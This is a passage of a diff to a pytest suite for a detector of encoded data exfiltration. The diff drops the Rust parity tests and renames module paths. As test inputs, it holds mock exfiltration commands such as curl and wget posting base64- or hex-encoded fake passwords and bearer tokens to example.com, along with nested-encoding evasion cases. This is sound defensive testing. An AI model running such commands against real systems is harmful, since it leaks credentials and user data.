count1 >= 1, "Should detect base64 with spaces" # Should detect: base64 at start of string payload2 = {"text": f"{encoded} followed by text"} - count2, _, findings2 = _scan_container(payload2, cfg, use_rust=use_rust) + count2, _, findings2 = _scan_container(payload2, cfg) assert count2 >= 1, "Should detect base64 at start" # Should detect: base64 at end of string payload3 = {"text": f"text followed by {encoded}"} - count3, _, findings3 = _scan_container(payload3, cfg, use_rust=use_rust) + count3, _, findings3 = _scan_container(payload3, cfg) assert count3 >= 1, "Should detect base64 at end" # Should detect: base64 with punctuation boundaries payload4 = {"text": f"curl -d '{encoded}' https://example.com"} - count4, _, findings4 = _scan_container(payload4, cfg, use_rust=use_rust) + count4, _, findings4 = _scan_container(payload4, cfg) assert count4 >= 1, "Should detect base64 with punctuation" - def test_hex_with_word_boundaries(self, use_rust: bool): + def test_hex_with_word_boundaries(self): """Test that hex patterns correctly match at word boundaries.""" cfg = EncodedExfilDetectorConfig() # Should detect: hex with spaces hex_data = b"password=secret-value-for-upload".hex() payload1 = {"text": f"data {hex_data} end"} - count1, _, findings1 = _scan_container(payload1, cfg, use_rust=use_rust) + count1, _, findings1 = _scan_container(payload1, cfg) assert count1 >= 1, "Should detect hex with spaces" # Should detect: hex with punctuation payload2 = {"text": f"POST /collect data={hex_data}"} - count2, _, findings2 = _scan_container(payload2, cfg, use_rust=use_rust) + count2, _, findings2 = _scan_container(payload2, cfg) assert count2 >= 1, "Should detect hex with punctuation" - def test_no_false_positives_in_urls(self, use_rust: bool): + def test_no_false_positives_in_urls(self): """Test that we don't falsely detect base64-like patterns in URLs.""" cfg = EncodedExfilDetectorConfig() @@ -144,22 +124,22 @@ def test_no_false_positives_in_urls(self, use_rust: bool): # and don't decode to sensitive content payload = {"url": "https://example.com/path/to/resource", "message": "Visit our website at https://example.com"} - count, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _, findings = _scan_container(payload, cfg) # Should have 0 findings since these are normal URLs without sensitive encoded data assert count == 0, "Should not detect normal URLs as encoded exfil" - def test_concatenated_alphanumeric_not_detected(self, use_rust: bool): + def test_concatenated_alphanumeric_not_detected(self): """Test that long alphanumeric strings that aren't valid encodings don't trigger.""" cfg = EncodedExfilDetectorConfig() # Long alphanumeric string that's not valid base64/hex payload = {"id": "user123456789abcdefghijklmnopqrstuvwxyz"} - count, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _, findings = _scan_container(payload, cfg) # Should not detect since it won't decode properly or meet suspicion criteria assert count == 0, "Should not detect random alphanumeric strings" - def test_base64url_detection(self, use_rust: bool): + def test_base64url_detection(self): """Test base64url encoding detection (uses - and _ instead of + and /).""" cfg = EncodedExfilDetectorConfig() @@ -170,11 +150,11 @@ def test_base64url_detection(self, use_rust: bool): encoded = base64.urlsafe_b64encode(b"api_key=secret-token-value-here").decode() payload = {"data": f"token={encoded}"} - count, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _, findings = _scan_container(payload, cfg) assert count >= 1, "Should detect base64url encoding" assert any(f.get("encoding") in {"base64", "base64url"} for f in findings) - def test_percent_encoding_detection(self, use_rust: bool): + def test_percent_encoding_detection(self): """Test percent-encoded data detection.""" cfg = EncodedExfilDetectorConfig() @@ -183,11 +163,11 @@ def test_percent_encoding_detection(self, use_rust: bool): percent_encoded = "".join(f"%{ord(c):02x}" for c in text) payload = {"data": f"send {percent_encoded} to server"} - count, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _, findings = _scan_container(payload, cfg) assert count >= 1, "Should detect percent encoding" assert any(f.get("encoding") == "percent_encoding" for f in findings) - def test_escaped_hex_detection(self, use_rust: bool): + def test_escaped_hex_detection(self): """Test escaped hex (\\xNN) detection.""" cfg = EncodedExfilDetectorConfig() @@ -196,7 +176,7 @@ def test_escaped_hex_detection(self, use_rust: bool): escaped_hex = "".join(f"\\x{ord(c):02x}" for c in text) payload = {"data": f"payload {escaped_hex}"} - count, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _, findings = _scan_container(payload, cfg) assert count >= 1, "Should detect escaped hex" assert any(f.get("encoding") == "escaped_hex" for f in findings) @@ -214,7 +194,7 @@ def _plugin(config: dict) -> EncodedExfilDetectorPlugin: return EncodedExfilDetectorPlugin( PluginConfig( name="EncodedExfilDetector", - kind="plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin", + kind="cpex_encoded_exfil_detection.encoded_exfil_detection.EncodedExfilDetectorPlugin", hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_POST_INVOKE], config=config, ) @@ -357,7 +337,7 @@ def test_scan_text_skips_disabled_encoding(self): def test_scan_container_non_matching_type(self): """Non-str/dict/list containers pass through unchanged.""" cfg = EncodedExfilDetectorConfig() - count, result, findings = _scan_container(42, cfg, use_rust=False) + count, result, findings = _scan_container(42, cfg) assert count == 0 assert result == 42 assert findings == [] @@ -366,19 +346,19 @@ def test_scan_container_list_input(self): """Lists are recursively scanned.""" cfg = EncodedExfilDetectorConfig() encoded = base64.b64encode(b"password=my-secret-value").decode() - count, result, findings = _scan_container([f"curl {encoded} webhook"], cfg, use_rust=False) + count, result, findings = _scan_container([f"curl {encoded} webhook"], cfg) assert count >= 1 def test_printable_ratio_empty_data(self): # First-Party - from plugins.encoded_exfil_detection.encoded_exfil_detector import _printable_ratio + from cpex_encoded_exfil_detection.encoded_exfil_detection import _printable_ratio assert _printable_ratio(b"") == 0.0 def test_evaluate_candidate_decoded_too_short(self): """Candidate decodes but result is shorter than min_decoded_length.""" # First-Party - from plugins.encoded_exfil_detection.encoded_exfil_detector import _evaluate_candidate + from cpex_encoded_exfil_detection.encoded_exfil_detection import _evaluate_candidate cfg = EncodedExfilDetectorConfig(min_decoded_length=100, min_encoded_length=8) # Candidate is long enough to pass min_encoded_length but decodes to < 100 bytes @@ -452,37 +432,30 @@ def test_config_partial_uses_defaults(self): # --------------------------------------------------------------------------- -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) class TestAllowlisting: """Verify allowlist_patterns configuration skips known-good encoded strings.""" - def test_allowlisted_base64_pattern_not_flagged(self, use_rust: bool): + def test_allowlisted_base64_pattern_not_flagged(self): """A base64 string matching an allowlist regex should not produce findings.""" # Encode a known-good value that would normally trigger detection allowed_value = base64.b64encode(b"authorization: bearer allowed-token-value").decode() cfg = EncodedExfilDetectorConfig(allowlist_patterns=[allowed_value[:16] + ".*"]) payload = {"body": f"curl -d '{allowed_value}' https://example.com/hook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count == 0, "Allowlisted pattern should not produce findings" - def test_non_allowlisted_base64_still_flagged(self, use_rust: bool): + def test_non_allowlisted_base64_still_flagged(self): """Allowlisting one pattern should not suppress detection of others.""" allowed = base64.b64encode(b"authorization: bearer allowed-token-value").decode() flagged = base64.b64encode(b"password=super-secret-credential-value").decode() cfg = EncodedExfilDetectorConfig(allowlist_patterns=[allowed[:16] + ".*"]) payload = {"body": f"curl -d '{flagged}' https://example.com/hook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1, "Non-allowlisted pattern should still be flagged" - def test_invalid_allowlist_regex_rejected_at_init(self, use_rust: bool): + def test_invalid_allowlist_regex_rejected_at_init(self): """An invalid regex in allowlist_patterns should raise at config or plugin init.""" with pytest.raises((ValidationError, Exception)): EncodedExfilDetectorConfig(allowlist_patterns=["[invalid"]) @@ -490,29 +463,29 @@ def test_invalid_allowlist_regex_rejected_at_init(self, use_rust: bool): EncodedExfilDetectorPlugin( PluginConfig( name="EncodedExfilDetector", - kind="plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin", + kind="cpex_encoded_exfil_detection.encoded_exfil_detection.EncodedExfilDetectorPlugin", hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_POST_INVOKE], config={"allowlist_patterns": ["[invalid"]}, ) ) - def test_allowlist_empty_has_no_effect(self, use_rust: bool): + def test_allowlist_empty_has_no_effect(self): """Empty allowlist should not suppress any detections.""" cfg = EncodedExfilDetectorConfig(allowlist_patterns=[]) encoded = base64.b64encode(b"authorization: bearer super-secret-token-value").decode() payload = {"body": f"curl -d '{encoded}' https://example.com/hook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 - def test_allowlist_partial_match_suppresses(self, use_rust: bool): + def test_allowlist_partial_match_suppresses(self): """An allowlist pattern that partially matches a candidate should suppress it.""" encoded = base64.b64encode(b"authorization: bearer super-secret-token-value").decode() # Pattern matches a substring of the encoded candidate cfg = EncodedExfilDetectorConfig(allowlist_patterns=[encoded[:12]]) payload = {"body": f"curl -d '{encoded}' https://example.com/hook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count == 0, "Partial allowlist match should suppress the candidate" @@ -521,17 +494,10 @@ def test_allowlist_partial_match_suppresses(self, use_rust: bool): # --------------------------------------------------------------------------- -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) class TestConfigurableKeywords: """Verify extra_sensitive_keywords and extra_egress_hints are merged with defaults.""" - def test_extra_sensitive_keyword_triggers_detection(self, use_rust: bool): + def test_extra_sensitive_keyword_triggers_detection(self): """A custom sensitive keyword (not in defaults) should boost the suspicion score.""" # Use a keyword NOT in the built-in _SENSITIVE_KEYWORDS list # "watsonx_cred" is custom; the payload contains no built-in keywords @@ -542,12 +508,12 @@ def test_extra_sensitive_keyword_triggers_detection(self, use_rust: bool): ) payload = {"data": encoded} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 # The custom keyword "watsonx_cred" should trigger sensitive_keywords scoring assert any("sensitive_keywords" in f.get("reason", []) for f in findings) - def test_extra_egress_hint_triggers_detection(self, use_rust: bool): + def test_extra_egress_hint_triggers_detection(self): """A custom egress hint (not in defaults) should boost the suspicion score.""" # Use "mq_publish" which is NOT in the built-in _EGRESS_HINTS list # Avoid ALL built-in hints: curl, wget, http://, https://, upload, webhook, @@ -560,11 +526,11 @@ def test_extra_egress_hint_triggers_detection(self, use_rust: bool): # Context only contains the custom hint "mq_publish", no built-in hints payload = {"data": f"mq_publish {encoded} to_queue"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 assert any("egress_context" in f.get("reason", []) for f in findings) - def test_default_keywords_still_work_with_extras(self, use_rust: bool): + def test_default_keywords_still_work_with_extras(self): """Adding custom keywords should not remove the built-in ones.""" encoded = base64.b64encode(b"password=super-secret-credential-value").decode() cfg = EncodedExfilDetectorConfig( @@ -573,11 +539,11 @@ def test_default_keywords_still_work_with_extras(self, use_rust: bool): ) payload = {"data": f"curl {encoded} webhook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 assert any("sensitive_keywords" in f.get("reason", []) for f in findings) - def test_mixed_case_extra_keyword_matches(self, use_rust: bool): + def test_mixed_case_extra_keyword_matches(self): """Extra sensitive keywords with mixed case must still match (case-insensitive).""" encoded = base64.b64encode(b"WatsonX_Cred=xq7m9Rk2vLpN3wJfHbYd8sTc").decode() cfg = EncodedExfilDetectorConfig( @@ -586,11 +552,11 @@ def test_mixed_case_extra_keyword_matches(self, use_rust: bool): ) payload = {"data": encoded} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 assert any("sensitive_keywords" in f.get("reason", []) for f in findings), "Mixed-case extra keyword should match case-insensitively" - def test_mixed_case_extra_egress_hint_matches(self, use_rust: bool): + def test_mixed_case_extra_egress_hint_matches(self): """Extra egress hints with mixed case must still match (case-insensitive).""" encoded = base64.b64encode(b"datafile=xq7m9Rk2vLpN3wJfHbYd8sTcMn").decode() cfg = EncodedExfilDetectorConfig( @@ -599,7 +565,7 @@ def test_mixed_case_extra_egress_hint_matches(self, use_rust: bool): ) payload = {"data": f"mq_publish {encoded} to_queue"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 assert any("egress_context" in f.get("reason", []) for f in findings), "Mixed-case extra egress hint should match case-insensitively" @@ -622,7 +588,7 @@ def _plugin(config: dict) -> EncodedExfilDetectorPlugin: return EncodedExfilDetectorPlugin( PluginConfig( name="EncodedExfilDetector", - kind="plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin", + kind="cpex_encoded_exfil_detection.encoded_exfil_detection.EncodedExfilDetectorPlugin", hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_POST_INVOKE, ResourceHookType.RESOURCE_POST_FETCH], config=config, ) @@ -683,7 +649,7 @@ def _plugin(config: dict) -> EncodedExfilDetectorPlugin: return EncodedExfilDetectorPlugin( PluginConfig( name="EncodedExfilDetector", - kind="plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin", + kind="cpex_encoded_exfil_detection.encoded_exfil_detection.EncodedExfilDetectorPlugin", hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_POST_INVOKE], config=config, ) @@ -763,17 +729,10 @@ async def test_include_detection_details_false_in_non_blocking_metadata(self): # --------------------------------------------------------------------------- -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) class TestBypassResistance: """Verify detection cannot be trivially bypassed.""" - def test_mixed_case_hex_detected(self, use_rust: bool): + def test_mixed_case_hex_detected(self): """Hex with alternating case should still be detected.""" cfg = EncodedExfilDetectorConfig() # Encode with mixed case @@ -782,11 +741,11 @@ def test_mixed_case_hex_detected(self, use_rust: bool): mixed = "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(hex_str)) payload = {"blob": f"POST /collect data={mixed}"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1, "Mixed-case hex should still be detected" assert any(f.get("encoding") == "hex" for f in findings) - def test_exactly_at_min_encoded_length_detected(self, use_rust: bool): + def test_exactly_at_min_encoded_length_detected(self): """A candidate exactly at min_encoded_length should be evaluated (not skipped).""" min_len = 24 cfg = EncodedExfilDetectorConfig(min_encoded_length=min_len, min_suspicion_score=1, min_decoded_length=4) @@ -796,10 +755,10 @@ def test_exactly_at_min_encoded_length_detected(self, use_rust: bool): assert len(hex_str) == min_len payload = {"data": f"curl {hex_str} webhook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1, f"Candidate at exactly min_encoded_length ({min_len}) should be evaluated" - def test_one_below_min_encoded_length_not_detected(self, use_rust: bool): + def test_one_below_min_encoded_length_not_detected(self): """A candidate one below min_encoded_length should be skipped.""" min_len = 24 cfg = EncodedExfilDetectorConfig(min_encoded_length=min_len, min_suspicion_score=1) @@ -809,10 +768,10 @@ def test_one_below_min_encoded_length_not_detected(self, use_rust: bool): assert len(hex_str) < min_len payload = {"data": f"curl {hex_str} webhook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count == 0, "Candidate below min_encoded_length should not be detected" - def test_padding_variations_base64(self, use_rust: bool): + def test_padding_variations_base64(self): """Base64 with various padding states should all be decoded and detected.""" cfg = EncodedExfilDetectorConfig(min_suspicion_score=1) @@ -823,10 +782,10 @@ def test_padding_variations_base64(self, use_rust: bool): for variant in [encoded_no_pad, encoded_padded]: payload = {"data": f"curl {variant} webhook"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1, f"Base64 variant '{variant[:20]}...' should be detected" - def test_encoded_payload_split_across_fields(self, use_rust: bool): + def test_encoded_payload_split_across_fields(self): """Each field should be scanned independently; suspicious fields detected.""" cfg = EncodedExfilDetectorConfig() # Two independently suspicious encoded payloads in separate fields @@ -834,13 +793,13 @@ def test_encoded_payload_split_across_fields(self, use_rust: bool): seg2 = base64.b64encode(b"api_key=another-secret-credential-two").decode() payload = {"field1": f"curl {seg1} webhook", "field2": f"wget {seg2} upload"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 2, "Both fields with encoded payloads should produce findings" paths = [f.get("path", "") for f in findings] assert any("field1" in p for p in paths), "field1 should have findings" assert any("field2" in p for p in paths), "field2 should have findings" - def test_long_segment_scoring_bonus(self, use_rust: bool): + def test_long_segment_scoring_bonus(self): """A candidate >= 2x min_encoded_length should get 'long_segment' bonus.""" cfg = EncodedExfilDetectorConfig(min_suspicion_score=1) # Create a long payload (well over 2x default 24) @@ -849,7 +808,7 @@ def test_long_segment_scoring_bonus(self, use_rust: bool): assert len(encoded) >= 48 # 2x default min_encoded_length payload = {"data": encoded} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1 assert any("long_segment" in f.get("reason", []) for f in findings), "Long segment should get scoring bonus" @@ -895,7 +854,7 @@ def test_all_encodings_disabled_returns_zero(self): hex_encoded = b"api_key=secret-value-for-upload".hex() payload = {"b64": f"curl {encoded} webhook", "hex": f"upload {hex_encoded}"} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=False) + count, _redacted, findings = _scan_container(payload, cfg) assert count == 0 assert findings == [] @@ -916,7 +875,7 @@ def test_non_container_types_pass_through(self): """Non-str/dict/list types (int, float, bool, None) should pass through unchanged.""" cfg = EncodedExfilDetectorConfig() for value in [42, 3.14, True, None]: - count, result, findings = _scan_container(value, cfg, use_rust=False) + count, result, findings = _scan_container(value, cfg) assert count == 0 assert result == value assert findings == [] @@ -931,7 +890,7 @@ def test_max_recursion_depth_stops_scanning(self): deep_payload = {"level1": deep_payload} deep_payload = {"level0": deep_payload} - count, _result, findings = _scan_container(deep_payload, cfg, use_rust=False) + count, _result, findings = _scan_container(deep_payload, cfg) # The encoded payload at depth 4 should NOT be found because recursion stops at depth 2 assert count == 0, "Scanning should stop at max_recursion_depth" assert findings == [] @@ -951,7 +910,7 @@ def test_plugin_init_with_invalid_config_raises(self): EncodedExfilDetectorPlugin( PluginConfig( name="EncodedExfilDetector", - kind="plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin", + kind="cpex_encoded_exfil_detection.encoded_exfil_detection.EncodedExfilDetectorPlugin", hooks=[PromptHookType.PROMPT_PRE_FETCH], config={"min_entropy": -5.0}, ) @@ -960,7 +919,7 @@ def test_plugin_init_with_invalid_config_raises(self): def test_scan_with_none_input_no_crash(self): """Scanning None should not crash.""" cfg = EncodedExfilDetectorConfig() - count, result, findings = _scan_container(None, cfg, use_rust=False) + count, result, findings = _scan_container(None, cfg) assert count == 0 assert result is None assert findings == [] @@ -972,84 +931,23 @@ def test_detection_logging_no_sensitive_content(self, caplog): encoded = base64.b64encode(f"password={secret}".encode()).decode() payload = {"data": f"curl {encoded} webhook"} - with caplog.at_level(logging.DEBUG, logger="plugins.encoded_exfil_detection.encoded_exfil_detector"): - _scan_container(payload, cfg, use_rust=False) + with caplog.at_level(logging.DEBUG, logger="cpex_encoded_exfil_detection.encoded_exfil_detection"): + _scan_container(payload, cfg) # The decoded secret should never appear in log output for record in caplog.records: assert secret not in record.getMessage(), "Decoded secret must not appear in log output" -# --------------------------------------------------------------------------- -# Group I — Rust/Python Parity -# --------------------------------------------------------------------------- - - -@pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available") -class TestRustPythonParity: - """Assert that Rust and Python paths produce identical results for the same input.""" - - def test_parity_base64_identical_count_and_scores(self): - """Same base64 input must produce identical count, scores, and encoding types.""" - cfg = EncodedExfilDetectorConfig() - encoded = base64.b64encode(b"authorization: bearer super-secret-token-value").decode() - payload = {"body": f"curl -d '{encoded}' https://example.com/hook"} - - count_py, _, findings_py = _scan_container(payload, cfg, use_rust=False) - count_rs, _, findings_rs = _scan_container(payload, cfg, use_rust=True) - - assert count_py == count_rs, f"Count mismatch: Python={count_py}, Rust={count_rs}" - assert len(findings_py) == len(findings_rs), "Finding count mismatch" - for fp, fr in zip(findings_py, findings_rs): - assert fp["encoding"] == fr["encoding"], f"Encoding mismatch: {fp['encoding']} vs {fr['encoding']}" - assert fp["score"] == fr["score"], f"Score mismatch: {fp['score']} vs {fr['score']}" - - def test_parity_hex_identical_redacted_output(self): - """Same hex input with redact=True must produce identical redacted strings.""" - cfg = EncodedExfilDetectorConfig(redact=True, redaction_text="[PARITY_REDACTED]", block_on_detection=False) - encoded_hex = b"password=secret-value-for-upload".hex() - payload = {"blob": f"POST /collect data={encoded_hex}"} - - _count_py, redacted_py, _findings_py = _scan_container(payload, cfg, use_rust=False) - _count_rs, redacted_rs, _findings_rs = _scan_container(payload, cfg, use_rust=True) - - assert redacted_py == redacted_rs, f"Redacted output mismatch:\nPython: {redacted_py}\nRust: {redacted_rs}" - - def test_parity_multi_encoding_identical_finding_order(self): - """Input with multiple encoding types must produce findings in same order with same fields.""" - cfg = EncodedExfilDetectorConfig(min_suspicion_score=1) - b64 = base64.b64encode(b"password=secret-token-value-here").decode() - hex_val = b"api_key=secret-value-for-upload!".hex() - payload = {"b64": f"curl {b64} webhook", "hex": f"upload {hex_val}"} - - count_py, _, findings_py = _scan_container(payload, cfg, use_rust=False) - count_rs, _, findings_rs = _scan_container(payload, cfg, use_rust=True) - - assert count_py == count_rs, f"Count mismatch: Python={count_py}, Rust={count_rs}" - assert len(findings_py) == len(findings_rs), "Finding count mismatch" - for fp, fr in zip(findings_py, findings_rs): - assert fp["encoding"] == fr["encoding"] - assert fp["path"] == fr["path"] - assert fp["score"] == fr["score"] - assert fp["decoded_len"] == fr["decoded_len"] - - # --------------------------------------------------------------------------- # Group K — Nested Encoding Detection # --------------------------------------------------------------------------- -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) class TestNestedEncodingDetection: """Verify detection of multi-layer encoded payloads.""" - def test_double_encoded_base64_detected(self, use_rust: bool): + def test_double_encoded_base64_detected(self): """base64(base64(sensitive_data)) — inner sensitive keywords found after peeling two layers. The outer base64 decodes to another base64 string. That inner base64 decodes to @@ -1063,11 +961,11 @@ def test_double_encoded_base64_detected(self, use_rust: bool): cfg = EncodedExfilDetectorConfig(max_decode_depth=2, min_suspicion_score=4) payload = {"data": outer} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1, "Double-encoded base64 should be detected via nested decoding" assert any("sensitive_keywords" in f.get("reason", []) for f in findings), "sensitive_keywords should be found after peeling inner layer" - def test_nested_detection_respects_max_decode_depth(self, use_rust: bool): + def test_nested_detection_respects_max_decode_depth(self): """With max_decode_depth=1, nested layers beyond the first should NOT be peeled. Triple-encoded: base64(base64(base64("password=secret"))). @@ -1080,11 +978,11 @@ def test_nested_detection_respects_max_decode_depth(self, use_rust: bool): # Shallow: depth=1 means no nested decoding (decode_depth 0 < 1-1=0 is false) cfg_shallow = EncodedExfilDetectorConfig(max_decode_depth=1, min_suspicion_score=4) - _count_shallow, _, findings_shallow = _scan_container({"data": level3}, cfg_shallow, use_rust=use_rust) + _count_shallow, _, findings_shallow = _scan_container({"data": level3}, cfg_shallow) # Deep: all layers peeled, sensitive_keywords found in innermost cfg_deep = EncodedExfilDetectorConfig(max_decode_depth=4, min_suspicion_score=4) - _count_deep, _, findings_deep = _scan_container({"data": level3}, cfg_deep, use_rust=use_rust) + _count_deep, _, findings_deep = _scan_container({"data": level3}, cfg_deep) # Deep decoding should find sensitive_keywords that shallow misses shallow_has_keywords = any("sensitive_keywords" in f.get("reason", []) for f in findings_shallow) @@ -1092,7 +990,7 @@ def test_nested_detection_respects_max_decode_depth(self, use_rust: bool): assert deep_has_keywords, "Deep decode should find sensitive_keywords in innermost layer" assert not shallow_has_keywords, "Shallow decode should NOT find sensitive_keywords" - def test_hex_wrapped_base64_detected(self, use_rust: bool): + def test_hex_wrapped_base64_detected(self): """hex(base64(sensitive_data)) — the inner base64 with keywords found after peeling hex. The hex layer decodes to base64 text. The base64 text decodes to content with 'api_key'. @@ -1104,28 +1002,21 @@ def test_hex_wrapped_base64_detected(self, use_rust: bool): cfg = EncodedExfilDetectorConfig(max_decode_depth=2, min_suspicion_score=4) payload = {"data": outer} - count, _redacted, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _redacted, findings = _scan_container(payload, cfg) assert count >= 1, "Hex-wrapped base64 should be detected via nested decoding" assert any("sensitive_keywords" in f.get("reason", []) for f in findings), "sensitive_keywords should be found after peeling hex then base64" # --------------------------------------------------------------------------- -# Group M — Rust-path coverage for new features +# Group M — New Feature Coverage # --------------------------------------------------------------------------- -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) -class TestNewFeaturesRustParity: - """Verify new features (per-encoding thresholds, JSON parsing) work on both paths.""" +class TestNewFeatures: + """Verify new features work on the packaged detector path.""" - def test_per_encoding_threshold_both_paths(self, use_rust: bool): - """Per-encoding thresholds should work identically on Python and Rust paths.""" + def test_per_encoding_threshold(self): + """Per-encoding thresholds should filter findings by encoding.""" cfg = EncodedExfilDetectorConfig( per_encoding_score={"hex": 8, "base64": 1}, min_suspicion_score=3, @@ -1134,13 +1025,13 @@ def test_per_encoding_threshold_both_paths(self, use_rust: bool): hex_payload = b"password=secret-value-for-upload".hex() payload = {"b64": f"curl {b64_payload} webhook", "hex": f"upload {hex_payload}"} - _, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + _, _, findings = _scan_container(payload, cfg) encodings_found = {f["encoding"] for f in findings} assert "base64" in encodings_found or "base64url" in encodings_found assert "hex" not in encodings_found - def test_json_within_string_both_paths(self, use_rust: bool): - """JSON-within-strings parsing should work identically on Python and Rust paths.""" + def test_json_within_string(self): + """JSON-within-strings parsing should preserve original string types.""" # Standard import json @@ -1149,31 +1040,31 @@ def test_json_within_string_both_paths(self, use_rust: bool): cfg = EncodedExfilDetectorConfig(min_suspicion_score=1, parse_json_strings=True) payload = {"data": json_str} - count, result, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, result, findings = _scan_container(payload, cfg) assert count == 1, f"Expected 1 finding but got {count}" # Return type must be string (no type mutation) assert isinstance(result["data"], str), f"Expected str but got {type(result['data'])}" - def test_json_heuristic_skips_non_json_strings(self, use_rust: bool): + def test_json_heuristic_skips_non_json_strings(self): """Strings not starting with { or [ should skip JSON parsing and scan as raw text.""" cfg = EncodedExfilDetectorConfig(min_suspicion_score=1, parse_json_strings=True) encoded = base64.b64encode(b"password=super-secret-credential-value").decode() payload = {"data": f"curl {encoded} webhook"} - count, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _, findings = _scan_container(payload, cfg) assert count >= 1 # Path should NOT contain "json" since the string doesn't start with { or [ assert not any("json" in f.get("path", "") for f in findings) - def test_malformed_json_no_crash_both_paths(self, use_rust: bool): + def test_malformed_json_no_crash(self): """Malformed JSON should fall back to raw text scan without crashing.""" cfg = EncodedExfilDetectorConfig(parse_json_strings=True) payload = {"data": '{"broken json: missing closing brace'} - count, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _, findings = _scan_container(payload, cfg) assert isinstance(count, int) - def test_json_string_returns_string_not_dict(self, use_rust: bool): + def test_json_string_returns_string_not_dict(self): """JSON-parsed strings must return the original string type, not a parsed dict.""" # Standard import json @@ -1182,17 +1073,17 @@ def test_json_string_returns_string_not_dict(self, use_rust: bool): cfg = EncodedExfilDetectorConfig(parse_json_strings=True) payload = {"data": json_str} - _, result, _ = _scan_container(payload, cfg, use_rust=use_rust) + _, result, _ = _scan_container(payload, cfg) # The "data" value must still be a string, not a parsed dict assert isinstance(result["data"], str), f"Expected str but got {type(result['data'])}" - def test_encoded_secret_in_dict_key_detected(self, use_rust: bool): + def test_encoded_secret_in_dict_key_detected(self): """Encoded secrets used as dict keys should be detected.""" encoded_key = base64.b64encode(b"password=super-secret-credential-value").decode() cfg = EncodedExfilDetectorConfig(min_suspicion_score=1) payload = {encoded_key: "some value"} - count, _, findings = _scan_container(payload, cfg, use_rust=use_rust) + count, _, findings = _scan_container(payload, cfg) assert count >= 1, "Encoded secret in dict key should be detected" assert any("key" in f.get("path", "") for f in findings), f"Finding path should contain 'key': {findings}" @@ -1217,7 +1108,7 @@ def test_json_within_string_parsed(self): cfg = EncodedExfilDetectorConfig(min_suspicion_score=1, parse_json_strings=True) payload = {"data": double_encoded_json} - count, result, findings = _scan_container(payload, cfg, use_rust=False) + count, result, findings = _scan_container(payload, cfg) assert count >= 1, "Should find base64 inside nested JSON strings" # Return type must remain string (no type mutation) @@ -1238,8 +1129,8 @@ def test_parse_json_strings_disabled(self): # The raw text has the base64 escaped with backslashes so regex won't match it directly payload = {"data": inner_json} - count_on, _, _ = _scan_container(payload, cfg_on, use_rust=False) - 